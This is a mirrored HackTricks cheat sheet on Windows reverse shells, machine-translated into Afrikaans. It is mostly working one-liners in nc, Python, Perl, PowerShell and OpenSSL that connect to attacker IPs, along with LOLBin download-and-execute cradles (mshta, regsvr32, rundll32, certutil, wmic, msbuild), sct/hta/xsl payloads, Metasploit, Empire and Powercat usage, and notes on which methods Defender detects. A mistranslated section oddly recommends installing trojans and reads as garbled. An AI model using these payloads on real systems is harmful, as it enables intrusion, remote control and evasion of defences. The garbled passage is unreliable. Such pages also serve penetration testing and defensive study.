Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-29 08:01:00 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/shells/windows.md

23 KiB
Raw Blame History

Skulpe - Windows

{% hint style="success" %} Leer & oefen AWS Hack: HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}

Probeer Hard Security Groep

{% embed url="https://discord.gg/tryhardsecurity" %}

Lolbas

Die bladsy lolbas-project.github.io is vir Windows soos https://gtfobins.github.io/ is vir Linux.
Duidelik, daar is nie SUID-lêers of sudo-voorregte in Windows nie, maar dit is nuttig om te weet hoe sommige binêre lêers (mis)bruik kan word om sekere soorte onverwagte aksies uit te voer soos die uitvoer van arbitrêre kode.

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

SBD

sbd is 'n draagbare en veilige Netcat-alternatief. Dit werk op Unix-soortgelyke stelsels en Win32. Met kenmerke soos sterk enkripsie, program uitvoering, aanpasbare bronpoorte, en voortdurende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows-gebruikers kan die sbd.exe weergawe van die Kali Linux-verspreiding gebruik word as 'n betroubare vervanging vir Netcat.

# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Aanvaller (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Sluit aan by 'n Windows-skootrekenaar

Om 'n skootrekenaar te koppel, kan jy die volgende stappe volg:

  1. Gebruik 'n afstandbeheerstelsel: Maak gebruik van sagteware soos TeamViewer, AnyDesk of UltraVNC om afstandbeheer oor die skootrekenaar te verkry.
  2. Trojaanse perd installeer: Installeer 'n trojaanse perd op die slagoffer se rekenaar om toegang te kry en beheer oor die stelsel te neem.
  3. Verbindingsopdrag gebruik: Maak gebruik van gereedskap soos netcat of nc om 'n verbindingsopdrag na die slagoffer se IP-adres en poort te skep.
  4. Versteekte skootrekenaar: Skep 'n versteekte skootrekenaar wat agter die slagoffer se rug loop en jou toegang tot die stelsel gee sonder dat hulle bewus is daarvan.

Onthou altyd om etiese riglyne te volg en slegs toestemming te verkry om toegang tot 'n skootrekenaar te verkry indien dit wettig is.

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Proses wat netwerkoproep uitvoer: powershell.exe
Lading geskryf op skyf: GEEN (ten minste nêrens kon ek vind deur procmon te gebruik!)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Proses wat netwerkoproep uitvoer: svchost.exe
Lading geskryf op skyf: WebDAV-klient plaaslike cache

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Kry meer inligting oor verskillende Powershell-Skille aan die einde van hierdie dokument

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta

Voorbeeld van hta-psh omgekeerde dop (gebruik hta om PS agterdeur af te laai en uit te voer)

<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager hta te gebruik

hta voorbeeld

Van hier af

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

Van hier af

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Opgespoor deur verdediger

Rundll32

Dll hallo wêreld voorbeeld

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Opgespoor deur verdediger

Rundll32 - sct

Van hier af

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Opgespoor deur verdediger

Regsvr32 -sct

Van hier af

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager regsvr te gebruik

Certutil

Laai 'n B64dll af, ontsluit dit en voer dit uit.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Laai 'n B64exe af, ontsluit dit en voer dit uit.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Opgespoor deur verdediger

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Opgespoor deur verdediger

PS-Bat

\\webdavserver\folder\batchfile.bat

Proses wat netwerkoproep uitvoer: svchost.exe
Lading geskryf op skyf: WebDAV-klient plaaslike cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`

\\10.8.0.3\kali\shell.bat

Opgespoor deur verdediger

MSIExec

Aanvaller

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Slagoffer:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Opgespoor

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Voorbeeld xsl-lêer van hier:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Nie opgespoor nie

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager wmic te gebruik

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Jy kan hierdie tegniek gebruik om Toepassingswitlysing en Powershell.exe-beperkings te omseil. Aangesien jy met 'n PS-skul gekonfronteer sal word.
Net aflaai en uitvoer dit: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Nie opgespoor nie

CSC

Kompileer C#-kode in die slagoffer se masjien.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Jy kan 'n basiese C# omgekeerde dop van hier af aflaai: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Nie opgespoor nie

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Ek het dit nie probeer nie

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Ek het dit nie probeer nie

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Doppe

PS-Nishang

https://github.com/samratashok/nishang

In die Doppe-vouer is daar baie verskillende doppe. Om Invoke-PowerShellTcp.ps1 af te laai en uit te voer, maak 'n kopie van die skripsie en voeg dit aan die einde van die lêer by:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Begin deur die skrip op 'n webbediener te bedien en voer dit uit aan die slagoffer se kant:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Verdediger beskou dit nie as skadelike kode nie (nog nie, 3/04/2019).

TODO: Kontroleer ander nishang shells

PS-Powercat

https://github.com/besimorhino/powercat

Laai af, begin 'n webbediener, begin die luisteraar, en voer dit aan die slagoffer se kant uit:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender ken dit nie as skadelike kode opspoor nie (nog nie, 3/04/2019).

Ander opsies wat deur powercat aangebied word:

Bind doppe, Omgekeerde dop (TCP, UDP, DNS), Poort omleiding, oplaai/aflaai, Genereer vragte, Bedien lêers...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Rykdom

https://github.com/EmpireProject/Empire

Skep 'n powershell-aanroeper, stoor dit in 'n lêer en laai dit af en voer dit uit.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Opgespoor as skadelike kode

MSF-Eenhoorn

https://github.com/trustedsec/eenhoorn

Skep 'n powershell weergawe van metasploit agterdeur deur eenhoorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Begin msfconsole met die geskepte hulpbron:

msfconsole -r unicorn.rc

Begin deur 'n webbediener te begin wat die powershell_attack.txt lêer bedien en voer uit op die slagoffer:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Opgespoor as skadelike kode

Meer

PS>Aanval PS-konsole met 'n paar aanvallige PS-modules wat vooraf gelaai is (gekodeer)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN PS-konsole met 'n paar aanvallige PS-modules en proksie-opsporing (IEX)

Verwysings

{% embed url="https://discord.gg/tryhardsecurity" %}

{% hint style="success" %} Leer & oefen AWS-hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP-hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}